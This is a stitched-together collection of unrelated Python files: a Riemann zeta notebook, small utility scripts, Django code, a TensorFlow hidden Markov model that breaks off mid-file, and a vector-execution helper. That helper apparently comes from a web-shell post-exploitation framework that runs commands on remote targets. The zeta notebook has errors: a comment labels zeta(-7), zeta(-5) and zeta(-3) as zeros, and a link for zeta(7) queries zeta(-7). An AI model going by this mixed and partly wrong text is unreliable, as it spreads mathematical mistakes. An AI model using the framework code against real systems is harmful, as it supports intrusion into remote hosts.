# Leonhard Euler proved the Euler product formula for the Riemann zeta function in his thesis Variae observationes circa series infinitas (Various Observations about Infinite Series), published by St Petersburg Academy in 1737.[1][2]
#
# In[4]:
print ("******************************************************************************")
print ("** The bridge between Riemann Zeta-fct in Complex Analysis and prime numbers *")
print ("* in Number Theory is given by the Euler Product, which Euler proved in 1735 *")
print ("******************************************************************************")
from IPython.display import Image
Image('Images/EulerProduct.jpg')
# ## Item2: Riemann's Hypothesis
#
# See: https://en.wikipedia.org/wiki/Riemann_hypothesis
#
# In mathematics, the Riemann hypothesis is a conjecture that the Riemann zeta function has its zeros only at the negative even integers and complex numbers with real part = 1/2.
# Many consider it to be the most important unsolved problem in pure mathematics.[1] It is of great interest in number theory because it implies results about the distribution of prime numbers. It was proposed by Bernhard Riemann (1859), after whom it is named.
# The Riemann hypothesis and some of its generalizations, along with Goldbach's conjecture and the twin prime conjecture, comprise Hilbert's eighth problem in David Hilbert's list of 23 unsolved problems; it is also one of the Clay Mathematics Institute's Millennium Prize Problems. The name is also used for some closely related analogues, such as the Riemann hypothesis for curves over finite fields.
# The first six zeros of zeta(s) are at s = 0.5 +/- 14.134725i; s=0.5 +/- 21.022040i; s = 0.5 +/- 25.010858i
# ### Item2.1: Zero-free region of Zeta-Function
#
# Apart from the trivial zeros, the Riemann zeta function has no zeros to the right of σ = 1 and to the left of σ = 0
# (neither can the zeros lie too close to those lines). Furthermore, the non-trivial zeros are symmetric about the
# real axis and the line σ = 1/2 and, according to the Riemann hypothesis, they all lie on the line σ = 1/2.
# In[5]:
print ("*** Zero-free_region_for_the_Riemann_zeta-function**** ")
from IPython.display import Image
Image('Images/Zero-free_region_for_the_Riemann_zeta-function.jpg')
# In[6]:
print (" ************************************************************ ")
print (" *** Here is an example-plot of the riemann zeta-function *** ")
print (" **** See non-trival zeros at 'critical' line real(z)=0.5 *** ")
print (" **** This is a visualization of the Riemann-Hypothesis ***** ")
print (" ************************************************************ ")
from IPython.display import Image
Image('Images/riemann-zeta1.jpg')
# In[7]:
print ("***********************************************************************")
print ("*** Example-plot of zeta(s) in the range |re(s)|< 6 & |im(s)|< 20i ****")
print ("*** In this range we see zeros at the points s = 0.5 +/- 14,134725i ***")
print ("***********************************************************************")
from IPython.display import Image
Image('Images/riemann-zeta2.jpg')
# ### Item 2.2: Main Program Code for calculation of Zeta(s), s=complex number
#
# This is the Program/Source Code (in Python) using complex the Riemann's Zeta-Fct (cRZ) for complex numbers (see above).
# Rounding errors may occur when we are using the cRZ formula, because this is an approximation method for the determination
# of zeta(s). The parameter t is defining the granularity of the approximation. Choosing smaller t, i.e. t=50 the rounding error will become smaller.
# The program will be executed later in the JN, when we calculate zeta(s), where s are special real numbers.
# For definition of the main pgm, we import the libray itertools, which inlude functions creating iterators for efficient looping.
#
# We use the python library Intertools: it's creating complex iterators which helps in getting faster execution time and writing memory-efficient code. Itertools provide us with functions for creating infinite sequences and itertools.
#
# count() is a second such function and it does exactly what it sounds like, it counts!
#
# itertools.islice(iterable, start, stop[, step]):Make an iterator that returns selected elements from the iterable. See also
# https://docs.python.org/3/library/itertools.html#itertools.islice
#
# scipy.special.binom(n,k) are the binomial coefficient n over k := n!/[(n-k)!k!]
# In[8]:
# Import libaries
from itertools import count, islice
from scipy.special import binom
# Program/Source Code (Python)using complex Riemann's Zeta-Fct (cRZ) for complex Numbers
# It is using the complex RiemannZeta formula (cRZ); see above
print ("** Because the cRZ method is an approximation method, rounding errors occur in the calculation of zeta(s,t) **")
print ("** Choosing a smaller value t, i.e. t=50 the error will get smaller if im(s)=0, try this out for other cases **")
print ("** During testing we found the best results with t=10 if im(s)=0; for other cases this may be wrong, try it! **")
def zeta(s, t = 100):
    """Approximate the Riemann zeta function at s (real or complex).

    Uses the globally convergent Hasse/Sondow double series, truncated
    after t outer terms; larger t reduces the truncation error.  The pole
    at s == 1 is reported as +infinity.
    """
    if s == 1:
        return float("inf")
    total = 0
    for n in range(t):
        # Inner binomial-transform sum for term n.
        inner = 0
        for k in range(n + 1):
            inner += (-1) ** k * binom(n, k) * (k + 1) ** -s
        total += 1 / 2 ** (n + 1) * inner
    # Prefactor converts the eta-like series into zeta(s).
    return total / (1 - 2 ** (1 - s))
print(" ")
print ("*** This ends the definition of main function zeta(s,t). Next we run some tests: ***")
print (" ")
print ("*** We calculate now the first six zeros of zeta(s); j denotes the imaginary unit: ***")
# The first six zeros of zeta(s) are at s = 0.5 +/- 14.134725i; s=0.5 +/- 21.022040i; s = 0.5 +/- 25.010858i
print (" ")
print ("zeta(0.5+14.134725j) =",zeta(0.5+14.134725j))
print ("zeta(0.5-14.134725j) =",zeta(0.5-14.134725j))
print (" ")
print ("zeta(0.5+21.022040j) =",zeta(0.5+21.022040j))
print ("zeta(0.5-21.022040j) =",zeta(0.5-21.022040j))
print (" ")
print ("zeta(0.5+25.010858j) =",zeta(0.5+25.010858j))
print ("zeta(0.5-25.010858j) =",zeta(0.5-25.010858j))
# ### Item2.3: 3-dim. Plot of Riemann Zeta Fct. for complex plane
#
# Lines in the complex plane where the Riemann zeta function is real (green) depicted on a relief representing the positive absolute value of zeta for arguments s, sigma and tau, where the real part of zeta is positive, and the negative absolute value of zeta where the real part of zeta is negative.
# This representation brings out most clearly that the lines of constant phase corresponding to phases of integer multiples of 2pi run down the hills on the left-hand side, turn around on the right and terminate in the non-trivial zeros.
# This pattern repeats itself infinitely many times. The points of arrival and departure on the right-hand side of the picture are equally spaced and given by equation (cRZ).
# In[9]:
print ("*** 3-dim. Plot of Riemann Zeta Fct. for complex plane / Explanation see above ***")
from IPython.display import Image
Image('Images/Plot-complex_RiemannZeta-Fct.jpg')
# ### Item2.4: Calulate Zeta(s) for s=integer.
#
# We calculate here some special values of the Riemann Zeta function Zeta(s), where s is a complex number, with Im(s)=0
# and s is an integer. So we list up the values of Zeta(s) with s = {-2, -1, 0, 1, 2, 3, 4, 6, 8}.
# For s=2 we see the famous Basel-problem (see Item1.2 above).
#
# We are using the pgm. defined above under the item: 'Main Program Code for calculation of Zeta(s), s=complex number'.
#
# To crosscheck the results you can use for example the Wolfram Alpha program in the internet:https://www.wolframalpha.com/
#
# For example zeta(7): https://www.wolframalpha.com/input/?i=zeta%28-7%29 or zeta(2): https://www.wolframalpha.com/input/?i=zeta%282%29
#
# We will proof in the next steps, that lim(Zeta(s))=1 when s goes in the direction of infinity.
#
# For s=2k (k=1,2,3,...), we see can define the values of Zeta(2k) with Bernoulli numbers Bk...
# See Bronstein, page 254, Formula '19.' (red box).
# In[10]:
print ("*** Bernoulli Numbers Bk ***")
from IPython.display import Image
Image('Images/bernoulli_numbers.jpg')
# In[11]:
print ("******************************************")
print ("*** examples: Zeta(s) for s = integers ***")
print ("******************************************")
# 1. zeta(s)=0 for s=-7,-5,-3
print ("*********** 1. check ************")
print ("*** zeta(-7) = 0,00416666... ****")
print ("zeta(-7) =",zeta(-7))
print ("*** zeta(-5) = -0,00396825... ***")
print ("zeta(-5) =",zeta(-5))
print ("**** zeta(-3) = 0,00833333... ***")
print ("zeta(-3) =",zeta(-3))
# 2. zeta(-2)=0
print ("*********** 2. check ************")
print ("*** zeta(-2) = 0 ****************")
print ("zeta(-2) =",zeta(-2))
# 3. zeta(-1)=-1/12=-0,08333333...
print ("************* 3. check *****************")
print ("*** zeta(-1) = -1/12 = -0,08333333... **")
# 4. zeta(0)=-1/2
print ("************* 4. check *****************")
print ("*** zeta(0) = -1/2 *********************")
print ("zeta(0) =",zeta(0))
# 5. zeta(1)=inifinity
print ("************* 5. check *****************")
print ("*** zeta(1)=unendlich(inf) *************")
print ("zeta(1) =",zeta(1))
# 6. zeta(2)=pi²/6 Bernoulli formula,k=1
print ("**************** 6. check *****************")
print ("*** zeta(2)=pi²/6 Bernoulli formula,k=1 ***")
print ("*** zeta(2)=pi²/6=1,64493406... ***********")
print ("zeta(2) =",zeta(2))
# 7. zeta(3)=1,2020...
print ("************** 7. check *******************")
print ("*** zeta(3)= 1,202056...*******************")
print ("zeta(3) =",zeta(3))
# 8. zeta(4)=(pi²)²/90 Bernoulli formula,k=2
print ("************* 8.check **********************")
print ("** zeta(4)=(pi²)²/90 Bernoulli formula,k=2 *")
print ("** zeta(4)=((pi²))²/90 = 1,08232323... *****")
print ("zeta(4) =",zeta(4))
# 9. zeta(5)=1,0369277...
print ("************* 9.check **********************")
print ("*** zeta(5)=1,0369277... *******************")
print ("zeta(5) =",zeta(5))
# 10. zeta(6)=(pi²)³/945 Bernoulli formula,k=3
print ("************** 10.check *********************")
print ("** zeta(6)=(pi²)³/945 Bernoulli formula,k=3 *")
print ("** zeta(6)=(pi²)³/945 = 1,01734330... *******")
print ("zeta(6) =",zeta(6))
# 11. zeta(7)=1,008349...
print ("************** 11.check *********************")
print ("*** zeta(7)=1,008349...**********************")
print ("zeta(7) =",zeta(7))
# 12. zeta(8)=(pi²)²)²/9450 Bernoulli formula,k=4
print ("*************** 12. check ************************")
print ("** zeta(8)=((pi²)²)²/9450 Bernoulli formula,k=4 **")
print ("** zeta(8)=1,00407735... *************************")
print ("zeta(8) =",zeta(8))
# 13. zeta(s) for s=50,100,201,500, 1201
print ("**************** 13. check************************")
print ("*** zeta(s) for s = 50,100,500,1000,10000 to ****")
print ("*** check [lim(s->inf)](zeta(s))=1 for s=int> 1 **")
print ("**************************************************")
print ("zeta(50) =",zeta(50))
print ("***************** check zeta(100) ***********************")
print ("** https://www.wolframalpha.com/input/?i=zeta%28100%29 **")
print ("zeta(100) =",zeta(100))
print ("zeta(500) =",zeta(500))
print ("zeta(1000) =",zeta(1000))
print ("zeta(10000) =",zeta(10000))
# ### Item2.5: Riem. Fct. Equation (RFE) using Gamma-Fct. & Trivial zeros of Zeta-Fct
#
# We calculate here some special values at trivial zeros of the Riemann Zeta function Zeta(s), where s is a complex number,
# with Im(s)=0. So we list up the values of Zeta(s) with s = {-8, -6, -4, -2}.
# In addition we calculate also some Zeta(s) where s is a fracture number.
#
# The zeta function satisfies the 'Riemann's Functional Equation (RFE)' - see image below:
#
# This is an equality of meromorphic functions valid on the whole complex plane. The equation relates values of the
# Riemann zeta function at the points s and 1 − s, in particular relating even positive integers with odd
# negative integers. Owing to the zeros of the sine function, the functional equation implies that zeta(s) has a
# simple zero at each even negative integers = −2n, known as the trivial zeros of zeta(s). When s is an even positive
# integer, the product sine(pi*s/2)* gamma(1 − s) on the right is non-zero because gamma(1 − s) has a simple pole,
# which cancels the simple zero of the sine factor.
# In[12]:
print ("**********************************************************************************")
print ("*** The zeta func. zeta(s) satisfies the 'Riemann's Functional Equation (RFE)' ***")
print ("**********************************************************************************")
from IPython.display import Image
Image('Images/Riemann_functional_equation.JPG')
# In[13]:
print ("**********************************************************************************")
print ("***** 3-dimensional plot of the absolute value of the complex gamma function *****")
print ("*** we also see the poles of gamma(z) where z=-n, n=1,2,3... (natural numbers) ***")
print ("**********************************************************************************")
from IPython.display import Image
Image('Images/Plot-complex_gamma-fct.JPG')
# In[14]:
print("******************************************************")
print("** 'Calculate zeta(s) for s=-1,-3,-5,-7 by using RFE **")
print("*******************************************************")
# 1. zeta(-1)=-1/12
print ("zeta(-1)=(1/2pi²)*sin(-pi/2)*gamma(2)*zeta(2)")
print (" =(1/2pi²)*(-1)*1*(pi²/6)=-1/12 ")
# 2. zeta(-3)=1/120
print ("*************************************************")
print ("zeta(-3)=(1/8(pi²)²)*sin(-3pi/2)*gamma(4)*zeta(4)")
print (" =(1/8(pi²)²)*(+1)*3!*((pi²)²/90)=6/(8*90)")
print (" =6/720=1/120 ")
# 3. zeta(-5)=-1/252
print ("**************************************************")
print ("zeta(-5)=(1/32(pi²)³)*sin(-5pi/2)*gamma(6)*zeta(6)")
print (" =(1/32(pi²)³)*(-1)*5!*((pi²)³/945) ")
print (" =-120/(32*945)=-1/(4*63)=-1/252 ")
# 4. zeta(-7)=1/240
print ("******************************************************")
print ("zeta(-7)=(1/128((pi²)²)²)*sin(-7pi/2)*gamma(8)*zeta(8)")
print (" =(1/128((pi²)²)²)*(+1)*7!*(((pi²)²)²/9450) ")
print (" =5040/(128*9450)=504/(128*945)=63/(16*945) ")
print (" =1/(16*15)=1/240 ")
# In[15]:
print("************************************************")
print("** 'Trivial' zeros are for z=-2,-4,-6,-8,etc. **")
print("************************************************")
# 1. zeta(-2)=0
print ("1. check zeta(-2)=0:")
print ("zeta(-2) =",zeta(-2))
# 2. zeta(-4)=0
print ("***************************************")
print ("2. check zeta(-4)=0:")
print ("zeta(-4) =",zeta(-4))
# 3. zeta(-6)=0
print ("**************************************")
print ("3. check zeta(-6)=0:")
print ("zeta(-6) =",zeta(-6))
# 4. zeta(-8)=0
print ("**************************************")
print ("4. check zeta(-8)=0:")
print ("zeta(-8) =",zeta(-8))
# In[16]:
# Calculate zeta(s) for fracture numbers s=-15/2,-13/2,...,15/2
print ("**********************************************************")
print ("**** calculate values for s = -15/2, -13/2, ..., 15/2 ****")
print ("*** check the results for s = -3/2, -1/2 and 1/2 using ***")
print ("*** the Riemann's Functional Equation (RFE); see above ***")
print ("**********************************************************")
print ("zeta(-15/2) =",zeta(-15/2))
print ("zeta(-13/2) =",zeta(-13/2))
print ("zeta(-11/2) =",zeta(-11/2))
print ("zeta(-9/2) =",zeta(-9/2))
print ("zeta(-7/2) =",zeta(-7/2))
print ("zeta(-5/2) =",zeta(-5/2))
print ("with RFE follows zeta(-3/2)=(-3/16)*(1/pi²)*zeta(5/2)")
print ("using zeta(5/2),see below,the correct result is found")
print ("zeta(-3/2) =",zeta(-3/2))
print ("with RFE we see that zeta(-1/2)=(-1/4)*(1/pi)*zeta(3/2)")
print ("using zeta(3/2), see below, the correct result is found")
print ("zeta(-1/2) =",zeta(-1/2))
print ("RFE=> zeta(1/2)=(2/2)*root((pi/pi))*zeta(1/2) is correct!")
print ("zeta(1/2) =",zeta(1/2))
print ("zeta(3/2) =",zeta(3/2))
print ("zeta(5/2) =",zeta(5/2))
print ("zeta(7/2) =",zeta(7/2))
print ("zeta(9/2) =",zeta(9/2))
print ("zeta(11/2) =",zeta(11/2))
print ("zeta(13/2) =",zeta(13/2))
print ("zeta(15/2) =",zeta(15/2))
# ### Item2.6: Summary of Results: Values+Graph of Riem. Zeta(s) Fct. with Im(s)=0
#
# As a summary and final result of the above work we show the graph of zeta(s) where Im(s)=0, s.t. s=real number (without s=1). We also use the calculated values of zeta(s) from this Jupyter Notebook and summarize them in a small table (see below).
# Remarks: We see a pole of zeta(s) at s=1 and an asymptote at f(s)=1 for s>1.
# Compare also the remarks about the lim(zeta(s)) for s which goes to the positive
# infinity: lim(s->+inf)=1.
# In[17]:
print ("**** Value-Table of Riem. Zeta(s) Fct. with Im(s)=0 ****")
from IPython.display import Image
Image('Images/Value_Zeta(s)_Im(s)=0.JPG')
# In[18]:
print ("****** Graph of Riem. Zeta(s) Fct. with Im(s)=0 ******")
from IPython.display import Image
Image('Images/Graph_Zeta(s)_Im(s)=0.JPG')
# In[19]:
import time
print("****current date and time **************")
print("Date and Time:",time.strftime("%d.%m.%Y %H:%M:%S"))
print("end")
|
'''
Created on Jul 14, 2012
@author: jon
'''
from struct import unpack
def parse(data):
    """Yield length-prefixed payloads read from the file-like *data*.

    Each packet is a 2-byte big-endian unsigned length followed by that
    many payload bytes.  Iteration stops at end of stream (missing header
    or missing payload).
    """
    while True:
        header = data.read(2)
        if not header:
            break  # clean end of stream
        (size,) = unpack('>H', header)
        payload = data.read(size)
        if not payload:
            break  # truncated packet: no payload available
        yield payload
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 14:16:33 2018
@author: thomas
"""
def main():
    """Write 'boundary.target': the boundary vertex count on the first
    line, then one '<vertex index> <Ks>' row per boundary vertex.
    """
    nvert_boundary = 34878  # number of vertices on the boundary surface
    Ks = 1.0e6              # value written for every vertex

    # 'with' guarantees the file is closed even if a write fails
    # (the original opened/closed manually; a commented-out block for
    # botup1/botlow1 targets was removed as dead code -- it even ended
    # with an uncalled `f.close`).
    with open('boundary.target', 'w') as f:
        f.write("%i\n" %(nvert_boundary))
        for i in range(nvert_boundary):
            f.write("%i %.3e\n" % (i,Ks))
#--------------------END OF MAIN---------------------
main()
|
from PIL import Image

# Produce three mirrored copies of lena.bmp using raw pixel access.
img_input = Image.open('lena.bmp')
img_output = Image.new(img_input.mode, img_input.size)
pixels_input = img_input.load()
pixels_output = img_output.load()

# Fix: PIL pixel access is indexed as (x, y) = (column, row), so x must run
# over the width and y over the height.  The original iterated x over the
# height and y over the width, which raises IndexError for any non-square
# image (it only worked because lena.bmp happens to be square).

# upside-down (vertical flip)
for x in range(img_output.width):
    for y in range(img_output.height):
        pixels_output[x, y] = pixels_input[x, img_output.height - y - 1]
img_output.save('upside-down.bmp')

# rightside-left (horizontal flip)
for x in range(img_output.width):
    for y in range(img_output.height):
        pixels_output[x, y] = pixels_input[img_output.width - x - 1, y]
img_output.save('rightside-left.bmp')

# diagonally mirrored (transpose); note this is only well-defined for
# square images, since the output keeps the input's size
for x in range(img_output.width):
    for y in range(img_output.height):
        pixels_output[x, y] = pixels_input[y, x]
img_output.save('diagonally-mirrored.png')
|
"""
The module `core.vectorlist` defines a `VectorList` object, normally used
to store the module vectors.
Module class executes `_register_vectors()` at init to initialize the `VectorList`
object as `self.vectors` module attribute.
The methods exposed by VectorList can be used to get the result of a
given vector execution with `get_result()`, get all the results of a bunch of
vectors with `get_results()`, or get the result of the first vector that
response in the way we want with `find_first_result()`.
"""
from core.vectors import Os
from mako.template import Template
from core.weexceptions import DevException, ModuleError
from core.loggers import log, dlog
from core import modules
from core import utilities
from core import messages
class VectorList(list):
    """A list of a module's vectors with helpers to execute them.

    Execution results can optionally be stored back into the session under
    the owning module's name.
    """

    def __init__(self, session, module_name):
        self.session = session
        self.module_name = module_name
        list.__init__(self)

    def find_first_result(self, names = None, format_args = None, condition = None, store_result = False, store_name = ''):
        """ Execute all the vectors and return the first result matching the given condition.

        Return the name and the result of the first vector execution response that satisfy
        the given condition.

        With unspecified names, execute all the vectors. Optionally store results.

        Exceptions triggered checking condition function are catched and logged.

        Args:
            names (list of str): The list of names of vectors to execute.

            format_args (dict): The arguments dictionary used to format the vectors with.

            condition (function): The function or lambda to check certain conditions on result.
            Must returns boolean.

            store_result (bool): Store as result.

            store_name (str): Store the found vector name in the specified argument.

        Returns:
            Tuple. Contains the vector name and execution result in the
            `( vector_name, result )` form.
        """
        # Fix: the former mutable defaults ([] and {}) were shared across
        # calls, and format_args is mutated below ('current_vector' key),
        # which leaked state between invocations.
        names = [] if names is None else names
        format_args = {} if format_args is None else format_args

        if not callable(condition):
            raise DevException(messages.vectors.wrong_condition_type)
        if not isinstance(store_name, str):
            raise DevException(messages.vectors.wrong_store_name_type)

        # Clean names filter from empty objects. Hoisted out of the vector
        # loop: it does not depend on the current vector.
        names = [ n for n in names if n ]

        for vector in self:

            # Skip with wrong vectors
            if not self._os_match(vector.target): continue

            # Skip if names filter is passed but current vector is missing
            if names and not any(n in vector.name for n in names): continue

            # Add current vector name
            format_args['current_vector'] = vector.name

            # Run
            result = vector.run(format_args)

            # See if condition is verified; a failing condition is logged
            # and treated as "not matched" rather than aborting the scan.
            try:
                condition_result = condition(result)
            except Exception as e:
                import traceback; log.info(traceback.format_exc())
                log.debug(messages.vectorlist.vector_s_triggers_an_exc % vector.name)
                condition_result = False

            # Eventually store result or vector name
            if condition_result:
                if store_result:
                    self.session[self.module_name]['results'][vector.name] = result
                if store_name:
                    self.session[self.module_name]['stored_args'][store_name] = vector.name

                return vector.name, result

        return None, None

    def get_result(self, name, format_args = None, store_result = False):
        """Execute one vector and return the result.

        Run the vector with specified name. Optionally store results.

        Args:
            name (str): The name of vector to execute.

            format_args (dict): The arguments dictionary used to format the vectors with.

            store_result (bool): Store result in session.

        Returns:
            Object. Contains the vector execution result
            (None when the vector is missing or targets another OS).
        """
        # Fix: avoid a shared, mutated default dict (see find_first_result).
        format_args = {} if format_args is None else format_args

        vector = self.get_by_name(name)

        if vector and self._os_match(vector.target):

            # Add current vector name
            format_args['current_vector'] = vector.name

            result = vector.run(format_args)

            if store_result:
                self.session[self.module_name]['results'][name] = result

            return result

    def get_results(self, names = None, format_args = None, results_to_store = None):
        """Execute all the vectors and return the results.

        With unspecified names, execute all the vectors. Optionally store results.
        Returns a dictionary with results.

        Args:
            names (list of str): The list of names of vectors to execute.

            format_args (dict): The arguments dictionary used to format the vectors with.

            results_to_store (list of str): The list of names of the vectors which
            store the execution result.

        Returns:
            Dictionary. Contains all the vector results in the
            `{ vector_name : result }` form.
        """
        # Fix: avoid shared, mutated default containers (see find_first_result).
        names = [] if names is None else names
        format_args = {} if format_args is None else format_args
        results_to_store = [] if results_to_store is None else results_to_store

        response = {}
        for vector in self:

            if not self._os_match(vector.target): continue
            if names and not any(x in vector.name for x in names): continue

            # Add current vector name
            format_args['current_vector'] = vector.name

            response[vector.name] = vector.run(format_args)

            if not any(x in vector.name for x in results_to_store): continue

            self.session[self.module_name]['results'][vector.name] = response[vector.name]

        return response

    def _os_match(self, os):
        """Check if vector os is compatible with the remote os."""

        os_string = self.session['system_info']['results'].get('os')

        # If os_string is not set, just return True and continue
        if not os_string: return True

        # Fix: the original referenced the undefined name `s.WIN`, raising
        # NameError for any Windows target; it must be Os.WIN.
        os_current = Os.WIN if os_string.lower().startswith('win') else Os.NIX

        return os in (os_current, Os.ANY)

    def get_by_name(self, name):
        """Get the vector object by name.

        Args:
            name (str): the name of the requested vector.

        Returns:
            Vector object, or None when no vector has that name.
        """
        return next((v for v in self if v.name == name), None)

    def get_names(self):
        """Get the vectors names.

        Returns:
            List of strings. Contain vectors names.
        """
        return [ v.name for v in self ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial migration: creates the `Destaque` (highlight) model."""

    # First migration of this app: no dependencies.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Destaque',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # Portuguese verbose names are stored as UTF-8 byte strings.
                ('titulo', models.CharField(max_length=100, verbose_name=b'T\xc3\xadtulo')),
                ('descricao', models.TextField(verbose_name=b'Descri\xc3\xa7\xc3\xa3o', blank=True)),
                ('imagem', models.ImageField(upload_to=b'imagens/destaques', blank=True)),
            ],
            options={
                'verbose_name': 'Destaque',
                'verbose_name_plural': 'Destaques',
            },
        ),
    ]
|
from django.shortcuts import render
from django.http import HttpResponse
import pandas as pd
from .models import Dataset
from .forms import ModelFormCSVFile
def home(request):
    """Render the analyst home page with a placeholder question id."""
    return render(request, 'analyst/home.html', {'question': 1})
def data(request):
    """List datasets; on POST either delete one (positive ``deleteid``)
    or add one from an uploaded CSV file."""
    if request.method == 'POST':
        print (request.POST['deleteid'])
        if int(request.POST['deleteid']) > 0:
            # delete the selected dataset, then show a fresh form
            Dataset.objects.get(id=request.POST['deleteid']).delete()
            form = ModelFormCSVFile()
        else:
            # add a new dataset from the uploaded CSV
            form = ModelFormCSVFile(request.POST, request.FILES)
            if form.is_valid():
                print (request.POST)
                record = Dataset(name=request.POST['name'], content=request.FILES['csvfile'])
                record.save()
    else:
        form = ModelFormCSVFile()

    datasets = Dataset.objects.order_by('-name')
    return render(request, 'analyst/data.html', {'datasets': datasets, 'form': form})
def dataallentries(request, data_id):
    """Render every row of the dataset *data_id* as an HTML table."""
    dataset = Dataset.objects.get(id=data_id)
    frame = pd.read_json(dataset.content)
    table_html = frame.to_html(classes=['table', 'table-striped'])
    return render(request, 'analyst/data_allentries.html', {'content': table_html})
|
def fibonaci_gen(limit):
    """Yield the first *limit* Fibonacci numbers, starting from 1."""
    prev, curr = 0, 1
    for _ in range(limit):
        yield curr
        prev, curr = curr, prev + curr


print(list(fibonaci_gen(10)))
|
"""
The implementation of hidden markov model using tensorflow for multiple sequences of discrete observations.
This implementation is simpler than the original version.
The tutorial of the original version can be found here: https://web.stanford.edu/~jurafsky/slp3/A.pdf
"""
import csv
from multiprocessing import current_process
import numpy as np
import pandas as pd
import tensorflow as tf
from graphviz import Digraph
class HMMD_TF:
    """Hidden Markov model with discrete observations, trained on multiple
    sequences with TensorFlow (v1 graph mode).

    Learned hyperparameters:
        pi: 1xN initial state probabilities
        A:  NxN state transition probabilities
        B:  NxV emission probabilities (V = vocabulary size)
    """

    def __init__(self):
        # Hyperparameters (pi, A, B, vocabulary) are created lazily in
        # fit() or loaded via read().
        pass

    def declare_variables(self, n_hidden_states, vocabulary):
        """Create TF placeholders for the sequences plus softmax-normalized
        variables for pi (1xN), A (NxN) and B (NxV)."""
        # create sequences
        tf_sequences = []
        for sequence in self.sequences:
            tf_sequence = tf.compat.v1.placeholder(shape=(len(sequence),), dtype=tf.int32)
            tf_sequences.append(tf_sequence)

        # create initial probability matrix
        tf_pi = tf.Variable(initial_value=tf.random.normal(shape=(1, n_hidden_states)), dtype=tf.float32,
                            name='pi')
        tf_pi = tf.nn.softmax(tf_pi)  # this ensures that sum of pi elements is equal to 1

        # create probability transaction matrix
        tf_A = tf.Variable(
            initial_value=tf.random.normal(shape=(n_hidden_states, n_hidden_states)),
            dtype=tf.float32, name='A')
        tf_A = tf.nn.softmax(tf_A, axis=1)

        # create emission matrix
        n_symbols = len(vocabulary)
        tf_B = tf.Variable(initial_value=tf.random.normal(shape=(n_hidden_states, n_symbols)),
                           dtype=tf.float32, name='B')
        tf_B = tf.nn.softmax(tf_B, axis=1)

        return tf_sequences, tf_pi, tf_A, tf_B

    def fit(self, sequences, vocabulary, weight_file_prefix, n_hidden_states, prefix, max_iterations=20000,
            convergence_threshold=1e-10):
        """Train pi, A and B by minimizing the negative total log-likelihood
        of the sequences with Adam (gradient-based alternative to Baum-Welch).

        Args:
            sequences: list of integer-encoded observation sequences.
            vocabulary: dict mapping symbol -> integer index.
            weight_file_prefix: path prefix used when checkpointing weights.
            n_hidden_states: number of hidden states N.
            prefix: label prepended to log messages.
            max_iterations: maximum number of Adam steps.
            convergence_threshold: stop when the cost change drops below this.
        """
        self.process_name = prefix + '[' + current_process().name + ']'
        self.vocabulary = vocabulary
        self.sequences = sequences
        self.n_hidden_states = n_hidden_states
        self.tf_sequences, self.tf_pi, self.tf_A, self.tf_B = self.declare_variables(self.n_hidden_states,
                                                                                     self.vocabulary)

        # Define the cost of hidden markov model
        # We need to find A, and B to minimize the cost.
        # Cost = -sum over sequences of log P(sequence | pi, A, B),
        # where P(...) comes from the forward algorithm (compute_anpha).
        tf_cost = 0
        for idx, sequence in enumerate(self.sequences):
            last_anpha = self.compute_anpha(self.tf_A, self.tf_B, self.tf_pi, self.tf_sequences[idx], len(sequence))
            tf_cost += tf.math.log(tf.reduce_sum(last_anpha))
        tf_cost = -tf_cost

        # set adaptive learning rate algorithm
        train_op = tf.compat.v1.train.AdamOptimizer(1e-3).minimize(tf_cost)

        # create feed-dict input
        feed_dict = dict()
        for idx, sequence in enumerate(sequences):
            feed_dict[self.tf_sequences[idx]] = sequences[idx]

        # training
        with tf.compat.v1.Session() as session:
            session.run(tf.compat.v1.global_variables_initializer())

            cost_arr = []
            for i in range(max_iterations):
                session.run(train_op, feed_dict)
                cost = session.run(tf_cost, feed_dict)
                cost_arr.append(cost)
                print(f'{self.process_name} iteration {i}: cost = {cost}')

                # save the current value of hyperparameters to file
                # (checkpoint every 50 iterations and on the last one)
                if i % 50 == 0 or i == max_iterations - 1:
                    self.A = session.run(self.tf_A, feed_dict)
                    self.B = session.run(self.tf_B, feed_dict)
                    self.pi = session.run(self.tf_pi, feed_dict)
                    print(f'{self.process_name} Export hyperparameters to file')
                    self.save(weight_file_prefix)

                # check convergence
                if len(cost_arr) >= 2:
                    delta = np.abs(cost_arr[-2] - cost_arr[-1])
                    print(f'{self.process_name} delta = {delta}')
                    if delta <= convergence_threshold:
                        # converge now
                        print(f'{self.process_name} Converge now. Stop!')
                        break

    def compute_anpha(self, tf_A, tf_B, tf_pi, tf_sequence, T):
        '''
        Compute anpha
        :param tf_A: the tensorflow variable of transaction probability matrix
        :param tf_B: the tensorflow variable of emission matrix
        :param tf_pi: the tensorflow variable of initial probability matric
        :param tf_sequence: the tensorflow variable of 1D array
        :param T: length of the input sequence
        :return: the last anpha
        '''
        # Forward algorithm: alpha_1 = pi * B[:, o_1], then
        # alpha_t = (alpha_{t-1} @ A) * B[:, o_t].
        last_anpha = tf.math.multiply(tf_pi, tf_B[:, tf_sequence[0]])  # 1xN
        for t in range(1, T):
            last_anpha = tf.multiply(tf.matmul(last_anpha, tf_A), tf_B[:, tf_sequence[t]])  # 1xN

        return last_anpha

    def find_symbol(self, vocabulary, index_symbol):
        """Reverse lookup: return the symbol mapped to *index_symbol*
        (implicitly returns None when no symbol has that index)."""
        for k, v in vocabulary.items():
            if v == index_symbol:
                return k

    def draw(self):
        """
        Draw HMM after finishing the training process
        :return:
        """
        dot = Digraph(comment='hmm')

        # create hidden state nodes
        for i in range(self.n_hidden_states):
            dot.node('s' + str(i), 'state ' + str(i))

        # create nodes in vocabulary
        for i in range(self.B.shape[1]):
            dot.node('o' + str(i), 'symbol ' + str(self.find_symbol(self.vocabulary, i)))

        # add weights: state->state edges labelled with A, state->symbol
        # edges labelled with B
        for i in range(self.A.shape[0]):
            for j in range(self.A.shape[1]):
                dot.edge('s' + str(i), 's' + str(j), label=str(self.A[i, j]))
        for i in range(self.B.shape[0]):
            for j in range(self.B.shape[1]):
                dot.edge('s' + str(i), 'o' + str(j), label=str(self.B[i, j]))

        dot.attr(label='#sequences = ' + str(len(self.sequences)))
        dot.render('../../graph-output/hmm_graph.gv', view=True)

    def save(self, matrix_prefix):
        '''
        Export pi, A, B and the vocabulary as CSV files.
